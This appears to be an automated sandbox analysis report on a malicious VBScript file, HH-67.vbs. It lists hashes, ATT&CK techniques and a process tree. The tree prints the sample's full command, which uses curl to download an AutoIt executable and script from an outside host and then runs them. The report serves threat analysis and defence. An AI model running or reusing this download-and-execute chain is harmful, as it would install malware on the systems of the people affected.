d1682e4468d87d86f2a0631e0e7b5803b1dddd8dde915a9016602831934557ff

Analysis

max time kernel
129s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11/10/2023, 13:10

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

HH-67.vbs
Size

9KB
MD5

4870ffa8695520621bcbf1b294447aee
SHA1

dd751d03c5766891c8156dc4024a5d11ec90e560
SHA256

d1682e4468d87d86f2a0631e0e7b5803b1dddd8dde915a9016602831934557ff
SHA512

e988121a415822969807b7ed12d2d28be86e5f89cfe5208ec5e8f1a671e533e2f0992b47d66979ddb4792eef8239da45f4cf4479e3e194ca20e65ca960c91ba6
SSDEEP

192:f8IMu0Cp4EmpXUHg4KR/oNQsK/iKiWSDX4X:f8PzE0ig4KR/aQsKHiWAIX

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
1584	Autoit3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 5064 wrote to memory of 3716	5064	WScript.exe	85
PID 5064 wrote to memory of 3716	5064	WScript.exe	85
PID 3716 wrote to memory of 4620	3716	cmd.exe	87
PID 3716 wrote to memory of 4620	3716	cmd.exe	87
PID 3716 wrote to memory of 1252	3716	cmd.exe	88
PID 3716 wrote to memory of 1252	3716	cmd.exe	88
PID 3716 wrote to memory of 1584	3716	cmd.exe	90
PID 3716 wrote to memory of 1584	3716	cmd.exe	90
PID 3716 wrote to memory of 1584	3716	cmd.exe	90

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HH-67.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5064
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe http://eugelens.com:2351 & curl -o bwmhtm.au3 http://eugelens.com:2351/msiqpwucsyz & Autoit3.exe bwmhtm.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://eugelens.com:2351
    3⤵
    PID:4620
- - C:\Windows\system32\curl.exe
    curl -o bwmhtm.au3 http://eugelens.com:2351/msiqpwucsyz
    3⤵
    PID:1252
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe bwmhtm.au3
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MRL3SWXH\idzktm[1]

Filesize
388KB

MD5
77b48f88ce9246cf92d6faa9761832ff

SHA1
bf3a955adcab4825047140537d0612ba72f85ebe

SHA256
fbc287bfb7586178fe7923c1c0c60491097afa81c71c6b02f0e3c79a629fabef

SHA512
11ec4c1ce8354122def5182f648fc67a69c859e4bb81b7dc52b3b514fe9ea5e9e03d6c52e979fd80e469d7f79f4440ec05814a7eaf097cb586833a3f4da38ac2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\bwmhtm.au3

Filesize
95KB

MD5
fd26bdf68bb6d1e03b1215979e2ed3ad

SHA1
872b0ae6c5f2f6b8e4c00684f0d4f0cdc154eb3b

SHA256
3a1ab251385afb83b35ee2f1381b1aedc76a2785be99dff9797e6b90b3492c7a

SHA512
b5bdc4c7c0684a92a8cbd5b05402fe66366b44e9c112dffb682d52d4904192d376ac0fc524e7436c7d394d339e36f86a7364b095f979e4338238eea86007621f

Download Submit
memory/1584-6-0x0000000001430000-0x0000000001830000-memory.dmp

Filesize
4.0MB

Download
memory/1584-13-0x00000000056D0000-0x00000000058B9000-memory.dmp

Filesize
1.9MB

Download
memory/1584-14-0x00000000056D0000-0x00000000058B9000-memory.dmp

Filesize
1.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads